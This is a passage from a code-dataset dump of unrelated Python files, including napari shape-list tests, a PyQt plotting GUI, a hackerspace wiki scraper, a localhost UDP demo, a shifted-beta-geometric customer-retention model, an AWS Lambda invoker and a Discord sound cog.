main()\n","sub_path":"build/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524267263","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 6 16:30:40 2014\n\n@author: napopa\n\"\"\"\n\ndef detect_anagrams(word,sentence):\n list_sentence = list(sentence)\n print(list_sentence)\n sorted_word = ''.join(sorted(word.lower()))\n print(sorted_word)\n result = [] \n \n for var in list_sentence:\n if ''.join(sorted(var.lower())) == sorted_word and var.lower() != word.lower():\n result.append(var)\n return result\n","sub_path":"all_data/exercism_data/python/anagram/815cb0a799ee438aaac90738f31db457.py","file_name":"815cb0a799ee438aaac90738f31db457.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66903640","text":"import numpy as np\nimport pytest\n\nfrom napari.layers.shapes._shape_list import ShapeList\nfrom napari.layers.shapes._shapes_models import Path, Polygon, Rectangle\n\n\ndef test_empty_shape_list():\n \"\"\"Test instantiating empty ShapeList.\"\"\"\n shape_list = ShapeList()\n assert len(shape_list.shapes) == 0\n\n\ndef test_adding_to_shape_list():\n \"\"\"Test adding shapes to ShapeList.\"\"\"\n np.random.seed(0)\n data = 20 * np.random.random((4, 2))\n shape = Rectangle(data)\n shape_list = ShapeList()\n\n shape_list.add(shape)\n assert len(shape_list.shapes) == 1\n assert shape_list.shapes[0] == shape\n\n\ndef test_nD_shapes():\n \"\"\"Test adding shapes to ShapeList.\"\"\"\n np.random.seed(0)\n shape_list = ShapeList()\n data = 20 * np.random.random((6, 3))\n data[:, 0] = 0\n shape_a = Polygon(data)\n shape_list.add(shape_a)\n\n data = 20 * np.random.random((6, 3))\n data[:, 0] = 1\n shape_b = Path(data)\n shape_list.add(shape_b)\n\n assert len(shape_list.shapes) == 2\n assert shape_list.shapes[0] == shape_a\n assert shape_list.shapes[1] == shape_b\n\n assert shape_list._vertices.shape[1] == 2\n assert shape_list._mesh.vertices.shape[1] == 2\n\n shape_list.ndisplay = 3\n assert shape_list._vertices.shape[1] == 3\n assert shape_list._mesh.vertices.shape[1] == 3\n\n\n@pytest.mark.parametrize(\"attribute\", ['edge', 'face'])\ndef test_bad_color_array(attribute):\n \"\"\"Test adding shapes to ShapeList.\"\"\"\n np.random.seed(0)\n data = 20 * np.random.random((4, 2))\n shape = Rectangle(data)\n shape_list = ShapeList()\n\n shape_list.add(shape)\n\n # test setting color with a color array of the 
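# --- Editor's note -----------------------------------------------------------
# The assertion below leans on pytest.raises as a context manager: the test
# passes only if the wrapped statement raises the named exception. The same
# pattern in isolation, for readers unfamiliar with it:
#
#     import pytest
#
#     def test_rejects_bad_input():
#         with pytest.raises(ValueError):
#             int("not a number")   # must raise, or the test fails
# -----------------------------------------------------------------------------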
wrong shape\n bad_color_array = np.array([[0, 0, 0, 1], [1, 1, 1, 1]])\n with pytest.raises(ValueError):\n setattr(shape_list, f'{attribute}_color', bad_color_array)\n","sub_path":"napari/layers/shapes/_tests/test_shape_list.py","file_name":"test_shape_list.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94898303","text":"from __future__ import with_statement\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QRect, pyqtSignal\nfrom PyQt5 import QtGui\nfrom PlotUI import Ui_PlotUIWindow\nfrom PGraph import Ui_PGraph\nfrom OpenDialog import Ui_Dialog\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QColorDialog, QWidget\n\nclass DesignerMainWindow(QMainWindow, Ui_PlotUIWindow,QtCore.QObject):\n def __init__(self,parent=None):\n super(DesignerMainWindow,self).__init__(parent)\n self.setupUi(self)\n self.tabWidget.clear()\n self.actionOpen.triggered.connect(self.on_actionOpen)\n self.applyButton.clicked.connect(self.on_apply)\n self.actionSave.triggered.connect(self.on_actionSave)\n self.actionSaveAs.triggered.connect(self.on_actionSaveAs)\n self.fileSaveName = \"\"\n self.graphDictionary = {}\n self.tabCount = 0\n self.openDialog = \"\"\n\n\n def on_actionOpen(self):\n self.openDialog = OpenDialog()\n self.openDialog.show()\n self.openDialog.drawSignal.connect(self.on_draw)\n\n def on_draw(self,fileName,name):\n graph = PGraph(fileName)\n self.tabWidget.addTab(graph,name)\n self.graphDictionary[self.tabCount] = graph\n self.plot()\n self.tabCount += 1\n\n def plot(self):\n for val in self.graphDictionary.values():\n x, y = np.loadtxt(val.file).T\n if val.plotStyleColor:\n self.mpl.canvas.ax.plot(x, y, color=val.plotStyleColor,label=val.label)\n else:\n self.mpl.canvas.ax.plot(x, y,label=val.label)\n if self.x_label:\n self.mpl.canvas.ax.set_xlabel(self.x_lineEdit.text())\n if self.y_label:\n self.mpl.canvas.ax.set_ylabel(self.y_lineEdit.text())\n if self.legendCheckBox.isChecked() == True:\n self.mpl.canvas.ax.legend(loc='best')\n self.mpl.canvas.draw()\n\n def on_apply(self):\n self.mpl.canvas.ax.clear()\n self.plot()\n\n def on_save(self):\n if self.fileSaveName:\n self.mpl.canvas.fig.savefig(self.fileSaveName)\n else:\n self.on_actionSaveAs()\n\n def on_actionSave(self):\n self.on_save()\n\n def on_actionSaveAs(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getSaveFileName(self, \"Save File\", \"\",\n \"Images (*.png *.jpg)\", options=options)\n if fileName:\n self.fileSaveName = fileName\n self.mpl.canvas.fig.savefig(self.fileSaveName)\n\n def on_color(self):\n color = QColorDialog.getColor()\n self.plotStyleColor = tuple(t/255 for t in color.getRgb())\n\nclass PGraph(QWidget,Ui_PGraph,QtCore.QObject):\n def __init__(self, fileName, parent=None):\n super(PGraph,self).__init__(parent)\n self.setupUi(self)\n self.file = fileName\n self.plotStyleColor = \"\"\n self.selectedColorButton.setEnabled(False)\n self.colorButton.clicked.connect(self.on_color)\n self.label = \"label\"\n\n def on_color(self):\n color = QColorDialog.getColor()\n self.selectedColorButton.setStyleSheet(\"background-color: \" + color.name())\n self.plotStyleColor = tuple(t/255 for t in color.getRgb())\n\n def setPlotStyleColor(self, color):\n self.plotStyleColor = color\n\n\nclass OpenDialog(QWidget,Ui_Dialog,QtCore.QObject):\n drawSignal = pyqtSignal(str,str)\n\n def 
__init__(self,parent=None):\n super(OpenDialog,self).__init__(parent)\n self.setupUi(self)\n self.fileName = \"\"\n self.plotStyleColor = \"\"\n self.selectedColor.setEnabled(False)\n self.searchButton.clicked.connect(self.on_search)\n self.colorButton.clicked.connect(self.on_color)\n self.drawButton.clicked.connect(self.on_draw)\n\n\n\n def on_color(self):\n color = QColorDialog.getColor()\n self.selectedColor.setStyleSheet(\"background-color: \" + color.name())\n self.plotStyleColor = tuple(t / 255 for t in color.getRgb())\n\n\n def on_search(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"Open File\", \"\",\n \"Text files (*.txt)\", options=options)\n if fileName:\n self.pathLineEdit.setText(fileName)\n self.fileName = fileName\n\n def on_draw(self):\n if self.nameLineEdit.text() != \"\":\n self.drawSignal.emit(self.fileName,self.nameLineEdit.text())\n else:\n self.drawSignal.emit(self.fileName,self.fileName)\n self.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# create the GUI application\napp = QApplication(sys.argv)\n# instantiate the main window\ndmw = DesignerMainWindow()\n# show it\ndmw.showMaximized()\n# start the Qt main loop execution, exiting from this script\n# with the same return code of Qt application\nsys.exit(app.exec_())\n","sub_path":"PlotUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418611308","text":"# coding: utf-8\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport csv\n\nfilename = 'active_hackerspaces_with_e-mail_0501-1000.csv'\n\n# url = 'https://wiki.hackerspaces.org/Special:Ask/-5B-5BCategory:Hackerspace-5D-5D/-3F=Hackerspace-23/-3F=Hackerspace-23/-3F=Hackerspace-23/-3FCountry/-3FState/-3FCity/-3FWebsite/-3FDate-20of-20founding/-3FHackerspace-20status/format=broadtable/limit=10/sort=Country/mainlabel=Hackerspace/offset=300'\n\n#url = 'https://wiki.hackerspaces.org/w/index.php?title=Special%3AAsk&q=%5B%5BCategory%3AHackerspace%5D%5D+%5B%5BHackerspace+status%3A%3Aactive%5D%5D+%5B%5BE-mail%3A%3A%2B%5D%5D&po=%3F%3DHackerspace%23%0D%0A%3FCountry%0D%0A%3FState%0D%0A%3FCity%0D%0A%3FWebsite%0D%0A%3FDate+of+founding%0D%0A%3FHackerspace+status%0D%0A%3FEmail%0D%0A&eq=yes&p%5Bformat%5D=broadtable&sort_num=&order_num=ASC&p%5Blimit%5D=5&p%5Boffset%5D=&p%5Blink%5D=all&p%5Bsort%5D=Country&p%5Bheaders%5D=show&p%5Bmainlabel%5D=Hackerspace&p%5Bintro%5D=&p%5Boutro%5D=&p%5Bsearchlabel%5D=...+further+results&p%5Bdefault%5D=&p%5Bclass%5D=sortable+wikitable+smwtable&eq=yes'\n\nurl = 'https://wiki.hackerspaces.org/w/index.php?title=Special:Ask&q=%5B%5BCategory%3AHackerspace%5D%5D+%5B%5BHackerspace+status%3A%3Aactive%5D%5D+%5B%5BE-mail%3A%3A%2B%5D%5D&p=format%3Dbroadtable%2Flink%3Dall%2Fheaders%3Dshow%2Fmainlabel%3DHackerspace%2Fsearchlabel%3D...-20further-20results%2Fclass%3Dsortable-20wikitable-20smwtable&po=%3F%3DHackerspace%23%0A%3FCountry%0A%3FState%0A%3FCity%0A%3FWebsite%0A%3FDate+of+founding%0A%3FHackerspace+status%0A%3FEmail%0A&sort=Country&limit=500&eq=no&offset=500'\n\nr = requests.get(url)\nsoup = bs(r.text, 'html.parser')\nt = soup.table\n\nclasses = 'Hackerspace,Hackerspace#,Country,State,City,Website,Date-of-founding,Hackerspace-status,Email'.split(',')\n\nwith open(filename, 'w', newline='') as csvfile:\n mywriter = csv.writer(csvfile, delimiter=',', quotechar='\\'', quoting=csv.QUOTE_MINIMAL)\n # escreve os nomes dos campos no cabeçalho do 
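# --- Editor's note (sketch; not part of the original record) -----------------
# OpenDialog above decouples the dialog from the main window with a custom
# pyqtSignal(str, str): the dialog emit()s, the window connect()s a slot.
# The same pattern reduced to its core (PyQt5 assumed, as in the record):
#
#     from PyQt5.QtCore import QObject, pyqtSignal
#
#     class Emitter(QObject):
#         drawSignal = pyqtSignal(str, str)   # must be a class attribute
#
#     e = Emitter()
#     e.drawSignal.connect(lambda path, name: print(path, name))
#     e.drawSignal.emit("data.txt", "my plot")
# -----------------------------------------------------------------------------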
arquivo csv\n mywriter.writerow(classes) #+ ['data-sort-value'])\n\n trs = t.find_all('tr')\n\n for tr in trs:\n current_line = []\n tds = tr.find_all('td')\n for i in range(len(classes)):\n current_line.append(tds[i].text)\n mywriter.writerow(current_line)\n\n","sub_path":"1_from_hackerspaces_org/hs_scrap_to_file.py","file_name":"hs_scrap_to_file.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"256954377","text":"# Eibhinn Lee\n# Calculating the BMI \n# weight in Kg\n# Height in metres\n\nw = 65\nh = 1.80\n\n# BMI = kg/metre sq\n\nsqmetres = (h**2)\n# BMI = x\n\nx = (w/sqmetres)\n\nprint(\"BMI of a person 65kg and 180 centimeters tall is\",x)\n\n","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401590165","text":"# each possibility (from at least COMEDY, MUSICAL and HORROR\n\n# An example run of the program (words in bold are typed in by the user and pop-up boxes may be used for input / output)\n\n\n# options\n\n# comedy\n# musical\n# action\n# horror\n\n\ncomedy = input(\"Would you like to see a comedy: \")\ncomedy = comedy.upper()\n\n # my error came as I did not ressasign the value to comedy.\n\n # I was doing comedy.upper()\n\n # this does not affect the 'comedy' variable, as it still contains it's original value.\n \n\nif comedy.upper() == 'YES' or comedy.upper() == 'Y': #in python, you must use the terms or, and (not && ||) and you must repeat the variable name again, when you are comparing another variable within the if statement, or the program would produce logical errors.\n print('You may want to watch big momma\\'s house or big daddy!')\n\nelif comedy.upper() == 'NO' or comedy.upper() == 'N':\n musical = input(\"Would you like to see a musical: \")\n\n if musical.upper() == 'YES' or musical.upper() == 'Y':\n print(\"You may want to watch les miserables or the lion king!\")\n\n elif musical.upper() == 'NO' or musical.upper() == 'N':\n action = input(\"Would you like to see an action film: \")\n\n if action.upper() == 'YES' or action.upper() == 'Y':\n print(\"You may want to watch spiderman or the incredible hulk!\")\n else:\n print(\"You can't please them all\")\n else:\n print(\"Please write yes or no! 
- musical else\")\nelse:\n print(\"Please write yes or no!\")\n","sub_path":"beginners/exercise12-16/theatreshows.py","file_name":"theatreshows.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"599921014","text":"#!/usr/bin/env python\n# Foundations of Python Network Programming - Chapter 2\n# udp_local.py\n# UDP client and server on localhost\n# Converted to Python3 by David Branner, 20140709, works.\n\nimport socket, sys\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nMAX = 65535\nPORT = 1060\n\nif sys.argv[1:] == ['server']:\n s.bind(('127.0.0.1', PORT))\n print('Listening at {}'.format(s.getsockname()))\n while True:\n data, address = s.recvfrom(MAX)\n print('The client at {} says {}'.\n format(address, str(data, 'utf-8')))\n s.sendto(bytes('Your data was {} bytes'.format(len(data)), 'utf-8'),\n address)\n\nelif sys.argv[1:] == ['client']:\n print('Address before sending: {}'.format(s.getsockname()))\n s.sendto(b'This is my message', ('127.0.0.1', PORT))\n print('Address after sending: {}'.format(s.getsockname()))\n data, address = s.recvfrom(MAX) # overly promiscuous - see text!\n print('The server {} says {}'.\n format(address, str(data, 'utf-8')))\n\nelse:\n sys.stderr.write('usage: udp_local.py server|client\\n')\n","sub_path":"rhodes_goerzen_foundations_py3k/udp_local.py","file_name":"udp_local.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"336807984","text":"\"\"\"\nImplementation of the shifted beta geometric (sBG) model from \"How to Project Customer Retention\" (Fader and Hardie 2006)\n\nhttp://www.brucehardie.com/papers/021/sbg_2006-05-30.pdf\n\nApache 2 License\n\"\"\"\n\nfrom math import log\n\nimport numpy as np\n\nfrom scipy.optimize import minimize\nfrom scipy.special import hyp2f1\n\n__author__ = \"JD Maturen\"\n\n\ndef generate_probabilities(alpha, beta, x):\n \"\"\"Generate probabilities in one pass for all t in x\"\"\"\n p = [alpha / (alpha + beta)]\n for t in range(1, x):\n pt = (beta + t - 1) / (alpha + beta + t) * p[t - 1]\n p.append(pt)\n return p\n\n\ndef probability(alpha, beta, t):\n \"\"\"Probability function P\"\"\"\n if t == 0:\n return alpha / (alpha + beta)\n return (beta + t - 1) / (alpha + beta + t) * probability(alpha, beta, t - 1)\n\n\ndef survivor(probabilities, t):\n \"\"\"Survivor function S\"\"\"\n s = 1 - probabilities[0]\n for x in range(1, t + 1):\n s = s - probabilities[x]\n return s\n\n\ndef log_likelihood(alpha, beta, data, survivors=None):\n \"\"\"Function to maximize to obtain ideal alpha and beta parameters\"\"\"\n if alpha <= 0 or beta <= 0:\n return -1000\n if survivors is None:\n survivors = survivor_rates(data)\n probabilities = generate_probabilities(alpha, beta, len(data))\n final_survivor_likelihood = survivor(probabilities, len(data) - 1)\n\n return sum([s * log(probabilities[t]) for t, s in enumerate(survivors)]) + data[-1] * log(\n final_survivor_likelihood\n )\n\n\ndef log_likelihood_multi_cohort(alpha, beta, data):\n \"\"\"Function to maximize to obtain ideal alpha and beta parameters using data across multiple (contiguous) cohorts.\n `data` must be a list of cohorts each with an absolute number per observed time unit.\"\"\"\n if alpha <= 0 or beta <= 0:\n return -1000\n probabilities = generate_probabilities(alpha, beta, len(data[0]))\n\n cohorts = len(data)\n total = 0\n for i, cohort in enumerate(data):\n total += 
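# --- Editor's note (sketch) ----------------------------------------------------
# The udp_local.py record above flags its client recvfrom as "overly
# promiscuous": any host may answer on that socket. Calling connect() on the
# UDP socket makes the kernel filter replies down to the one peer (no
# handshake is sent; this only fixes the remote address):
#
#     import socket
#     s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     s.connect(('127.0.0.1', 1060))    # same port as the record
#     s.send(b'This is my message')     # send()/recv() replace sendto/recvfrom
#     data = s.recv(65535)              # only datagrams from 127.0.0.1:1060
# -------------------------------------------------------------------------------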
sum(\n            [(cohort[j] - cohort[j + 1]) * log(probabilities[j]) for j in range(len(cohort) - 1)]\n        )\n        total += cohort[-1] * log(survivor(probabilities, cohorts - i - 1))\n    return total\n\n\ndef survivor_rates(data):\n    s = []\n    for i, x in enumerate(data):\n        if i == 0:\n            s.append(1 - data[0])\n        else:\n            s.append(data[i - 1] - data[i])\n    return s\n\n\ndef maximize(data):\n    survivors = survivor_rates(data)\n    func = lambda x: -log_likelihood(x[0], x[1], data, survivors)\n    x0 = np.array([100.0, 100.0])\n    res = minimize(func, x0, method=\"nelder-mead\", options={\"xtol\": 1e-8})\n    return res\n\n\ndef maximize_multi_cohort(data):\n    func = lambda x: -log_likelihood_multi_cohort(x[0], x[1], data)\n    x0 = np.array([1.0, 1.0])\n    res = minimize(func, x0, method=\"nelder-mead\", options={\"xtol\": 1e-8})\n    return res\n\n\ndef predicted_retention(alpha, beta, t):\n    \"\"\"Predicted retention probability at t. Function 8 in the paper\"\"\"\n    return (beta + t) / (alpha + beta + t)\n\n\ndef predicted_survival(alpha, beta, x):\n    \"\"\"Predicted survival probability, i.e. percentage of customers retained, for all t in x.\n    Function 1 in the paper\"\"\"\n    s = [predicted_retention(alpha, beta, 0)]\n    for t in range(1, x):\n        s.append(predicted_retention(alpha, beta, t) * s[t - 1])\n    return s\n\n\ndef fit(data):\n    res = maximize(data)\n    if res.status != 0:\n        raise Exception(res.message)\n    return res.x\n\n\ndef fit_multi_cohort(data):\n    res = maximize_multi_cohort(data)\n    if res.status != 0:\n        raise Exception(res.message)\n    return res.x\n\n\ndef derl(alpha, beta, d, n):\n    \"\"\"discounted expected residual lifetime from \"Customer-Base Valuation in a Contractual Setting: The Perils of\n    Ignoring Heterogeneity\" (Fader and Hardie 2009)\"\"\"\n    return predicted_retention(alpha, beta, n) * hyp2f1(\n        1, beta + n + 1, alpha + beta + n + 1, 1 / (1 + d)\n    )\n\n\ndef predict_with_terminal_churn(data, future_periods, max_terminal_renewal=0.98):\n    \"\"\"\n    For data with duplicate values such as this:\n    0.695652174 0.695652174 0.304347826 0.130434783\n\n    the sBG method breaks down, so here we just use\n    the terminal churn method, where the future renewal rate\n    equals the last known renewal rate.\n    \"\"\"\n\n    future_data = data.copy()\n\n    terminal_renewal_rate = min(data[-1] / data[-2], max_terminal_renewal)\n    last_value = data[-1]\n    for i in range(future_periods):\n        next_value = last_value * terminal_renewal_rate\n        last_value = next_value\n        future_data.append(next_value)\n\n    return future_data\n\n\ndef apply_smoothing(data, predicted_data):\n    \"\"\"\n    For some predictions the first N predicted values are higher than the\n    last known value, which cannot happen in reality with retention data.\n\n    Example:\n\n    A           B           C           D\n    Known       Known       Predicted   Predicted\n    0.12342216  0.119615308 0.135569514 0.132488536\n\n    This smoothing method adjusts all future predictions down by:\n    C - (B/A) * B\n\n    The idea here is that (B/A) * B is our expected next period value, but C is our\n    next value from the curve. 
Adjust the whole curve down by the difference of those\n    values\n\n    \"\"\"\n\n    last_known_datapoint = data[-1]\n    first_predicted_datapoint = predicted_data[len(data)]\n\n    if first_predicted_datapoint > last_known_datapoint:\n        first_pred_val = predicted_data[len(data)]\n        rev_first_pred_val = (last_known_datapoint / data[-2]) * last_known_datapoint\n        adj_fact = first_pred_val - rev_first_pred_val\n\n        for i in range(len(data), len(predicted_data)):\n            predicted_data[i] = predicted_data[i] - adj_fact\n\n    return predicted_data\n\n\ndef fit_predict(data, future_periods, include_past=False, smoothing=True, cohort_name=None):\n    \"\"\"Combine fit and predict_survival into one step\"\"\"\n\n    sbg_fit_failed = False\n\n    if data[-1] == 0.0:\n        predicted_data = data.copy()\n        for i in range(future_periods):\n            predicted_data.append(0.0)\n        sbg_fit_failed = True\n\n    if not sbg_fit_failed:\n        try:\n            alpha, beta = fit(data)\n        except Exception:\n            if cohort_name is not None:\n                print(\"Switching to terminal churn rate for cohort: {}\".format(cohort_name))\n            predicted_data = predict_with_terminal_churn(data, future_periods)\n            sbg_fit_failed = True\n\n    if not sbg_fit_failed:\n        # predict the next future_periods time samples:\n        predicted_data = predicted_survival(alpha, beta, len(data) + future_periods)\n\n        if smoothing:\n            predicted_data = apply_smoothing(data, predicted_data)\n\n    if include_past:\n        return predicted_data\n    else:\n        return predicted_data[-future_periods:]\n\n\ndef test():\n    \"\"\"Test against the High End subscription retention data from the paper\"\"\"\n    example_data = [0.869, 0.743, 0.653, 0.593, 0.551, 0.517, 0.491]\n    ll11 = log_likelihood(1.0, 1.0, example_data)\n    print(np.allclose(ll11, -2.115, 1e-3))\n\n    res = maximize(example_data)\n    alpha, beta = res.x\n    print(res.status == 0 and np.allclose(alpha, 0.668, 1e-3) and np.allclose(beta, 3.806, 1e-3))\n    print()\n\n    print(\"real\\t\", [\"{0:.1f}%\".format(x * 100) for x in example_data])\n    print(\"pred\\t\", [\"{0:.1f}%\".format(x * 100) for x in predicted_survival(alpha, beta, 12)])\n    print()\n\n    print(list(map(\"{0:f}\".format, [derl(alpha, beta, 0.1, x) for x in range(12)])))\n    print()\n\n    multi_cohort_data = [\n        [10000, 8000, 6480, 5307, 4391],\n        [10000, 8000, 6480, 5307],\n        [10000, 8000, 6480],\n        [10000, 8000],\n    ]\n    alpha, beta = fit_multi_cohort(multi_cohort_data)\n    print(np.allclose(alpha, 3.80, 1e-2) and np.allclose(beta, 15.19, 1e-2))\n\n\ndef added_tests():\n    # two examples of duplicate values\n    data1 = [0.695652174, 0.695652174, 0.304347826, 0.130434783]\n    data2 = [1.0, 1.0, 0.666666667, 0.333333333]\n\n    # handling zero retention at the end\n    data3 = [0.662093647, 0.53146436, 0.432448554, 0.371905756, 0.0]\n\n    # handling smoothing\n    data4 = [\n        0.662093647,\n        0.53146436,\n        0.432448554,\n        0.371905756,\n        0.326871458,\n        0.294661497,\n        0.267223382,\n        0.240679988,\n        0.225171488,\n        0.204891142,\n        0.190873844,\n        0.174470623,\n        0.16433045,\n        0.1565762,\n        0.144646585,\n        0.136892335,\n        0.130032806,\n        0.12496272,\n    ]\n\n    # should switch to using terminal churn rate\n    t1 = fit_predict(data1, 5, cohort_name=\"Test Cohort 1\")\n    t2 = fit_predict(data2, 5, cohort_name=\"Test Cohort 2\")\n\n    # should return all zeros at the end\n    t3 = fit_predict(data3, 5, cohort_name=\"Test Cohort 3\")\n    print(t3)\n\n    # test of smoothing, first smoothing is off\n    t4 = fit_predict(data4, 5, cohort_name=\"Test Cohort 4\", smoothing=False)\n    print(f\"Future value of {t4[0]} is greater than present value of {data4[-1]}\")\n\n    # now with smoothing turned on\n    t5 = fit_predict(data4, 5, 
cohort_name=\"Test Cohort 4\", smoothing=True)\n print(f\"Future values like {t5[0]} are adjusted to be less than {data4[-1]}\")\n\n\nif __name__ == \"__main__\":\n test()\n added_tests()\n","sub_path":"shifted_beta_geometric/sbg.py","file_name":"sbg.py","file_ext":"py","file_size_in_byte":9237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"527005077","text":"from time import time\nfrom subprocess import call\nfrom threading import Thread\n\n\nclass ExecuteLambda:\n def __init__(self, lambda_name, cmd_executor=call, out=print):\n self._lambda_name = lambda_name\n self._executor = cmd_executor\n self._out = out\n self.runtime = None\n\n def exec(self):\n start = time()\n f_name = f\"/tmp/{time()}\"\n cmd_str = f\"aws lambda invoke --function-name {self._lambda_name} '{f_name}'\"\n self._out(cmd_str)\n self._executor(cmd_str)\n with open(f_name) as f:\n self._out(f.read())\n self.runtime = time() - start\n\n\ndef exec_in_parallel(target, max_threads=10):\n threads = {index: {\"thread\": Thread(target=target)} for index in range(max_threads)}\n for thread_dict in threads.values():\n thread_dict[\"thread\"].start()\n thread_dict[\"start_time\"] = time()\n for thread_dict in threads.values():\n thread_dict[\"thread\"].join()\n thread_dict[\"end_time\"] = time()\n\n\nif __name__ == '__main__':\n exec_in_parallel(\n lambda: ExecuteLambda(\n \"A_ReusableInstances\",\n cmd_executor=lambda x: call(x, shell=True)\n ).exec(),\n max_threads=1\n )\n","sub_path":"AWS/Lambda/B_Runtime/src/main/java/parallel_client.py","file_name":"parallel_client.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"343942502","text":"import logging\nimport random\nfrom pathlib import Path\n\nimport discord\nfrom discord.ext import commands\n\nfrom bot.bot import SeasonalBot\nfrom bot.constants import Hacktoberfest\n\nlog = logging.getLogger(__name__)\n\n\nclass SpookySound(commands.Cog):\n \"\"\"A cog that plays a spooky sound in a voice channel on command.\"\"\"\n\n def __init__(self, bot: SeasonalBot):\n self.bot = bot\n self.sound_files = list(Path(\"bot/resources/halloween/spookysounds\").glob(\"*.mp3\"))\n self.channel = None\n\n @commands.cooldown(rate=1, per=1)\n @commands.command(brief=\"Play a spooky sound, restricted to once per 2 mins\")\n async def spookysound(self, ctx: commands.Context) -> None:\n \"\"\"\n Connect to the Hacktoberbot voice channel, play a random spooky sound, then disconnect.\n\n Cannot be used more than once in 2 minutes.\n \"\"\"\n if not self.channel:\n await self.bot.wait_until_guild_available()\n self.channel = self.bot.get_channel(Hacktoberfest.voice_id)\n\n await ctx.send(\"Initiating spooky sound...\")\n file_path = random.choice(self.sound_files)\n src = discord.FFmpegPCMAudio(str(file_path.resolve()))\n voice = await self.channel.connect()\n voice.play(src, after=lambda e: self.bot.loop.create_task(self.disconnect(voice)))\n\n @staticmethod\n async def disconnect(voice: discord.VoiceClient) -> None:\n \"\"\"Helper method to disconnect a given voice client.\"\"\"\n await voice.disconnect()\n\n\ndef setup(bot: SeasonalBot) -> None:\n \"\"\"Spooky sound Cog load.\"\"\"\n bot.add_cog(SpookySound(bot))\n","sub_path":"bot/exts/halloween/spookysound.py","file_name":"spookysound.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
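# A minimal usage sketch for the sbg.py record above. It assumes the file is
# importable as "sbg" (a name inferred from its sub_path, not stated in the
# record) and reuses the High End retention data already present in test():
#
#     import sbg
#     observed = [0.869, 0.743, 0.653, 0.593, 0.551, 0.517, 0.491]
#     alpha, beta = sbg.fit(observed)        # maximum-likelihood sBG parameters
#     future = sbg.fit_predict(observed, 4)  # next 4 projected retention rates
#     print(alpha, beta, future)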
+{"seq_id":"373454588","text":"\"\"\" Test itl module utils. \"\"\"\n\nimport os\nimport pytest\n\nimport itl.utils as utils\nimport tensorflow as tf\nimport numpy as np\n\n\ndef test_default_1():\n val = 1\n assert(utils.default(val, None) == val)\n\n\ndef test_default_None():\n val = None\n assert(utils.default(val, 1) is not None)\n\n\ndef test_get_env_precision_float32():\n os.environ['ITL_PRECISION'] = 'fp32'\n precision = utils.get_env_precision()\n del os.environ['ITL_PRECISION']\n assert(precision == 'fp32')\n\n\ndef test_get_env_precision_float64():\n os.environ['ITL_PRECISION'] = 'fp64'\n precision = utils.get_env_precision()\n del os.environ['ITL_PRECISION']\n assert(precision == 'fp64')\n\n\ndef test_get_env_precision_failure():\n os.environ['ITL_PRECISION'] = 'int32'\n with pytest.raises(NotImplementedError):\n precision = utils.get_env_precision()\n del os.environ['ITL_PRECISION']\n\ndef test_variable_summaries_int():\n dummy = tf.constant(1)\n utils.variable_summaries(\"dummy\", dummy)\n with tf.Session() as sess:\n test = sess.run(dummy)\n assert(test == 1)\n\n\ndef test_variable_summaries_float32():\n os.environ['ITL_PRECISION'] = 'fp32'\n dummy = tf.Variable(tf.zeros(shape=[2, 3], dtype=tf.float32),\n trainable=True, name='dummy')\n utils.variable_summaries(\"dummy\", dummy)\n tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n test = sess.run(dummy)\n del os.environ['ITL_PRECISION']\n assert(np.allclose(test, np.zeros((2, 3))))\n\n\ndef test_variable_summaries_float64():\n os.environ['ITL_PRECISION'] = 'fp64'\n dummy = tf.Variable(tf.zeros(shape=[2, 3], dtype=tf.float64),\n trainable=True, name='dummy')\n utils.variable_summaries(\"dummy\", dummy)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n test = sess.run(dummy)\n del os.environ['ITL_PRECISION']\n assert(np.allclose(test, np.zeros((2, 3))))\n\n\ndef test_Problem_Regression():\n pb = utils.Problem\n assert(hasattr(pb, 'Regression'))\n\n\ndef test_Problem_Classification():\n pb = utils.Problem\n assert(hasattr(pb, 'Classification'))\n\n\ndef test_tf_type_float32():\n fp = 'fp32'\n assert(utils.tf_type(fp) is tf.float32)\n\n\ndef test_tf_type_float64():\n fp = 'fp64'\n assert(utils.tf_type(fp) is tf.float64)\n\n\ndef test_tf_type_int32():\n fp = 'int64'\n with pytest.raises(NotImplementedError):\n dummy = utils.tf_type(fp)\n\n\ndef 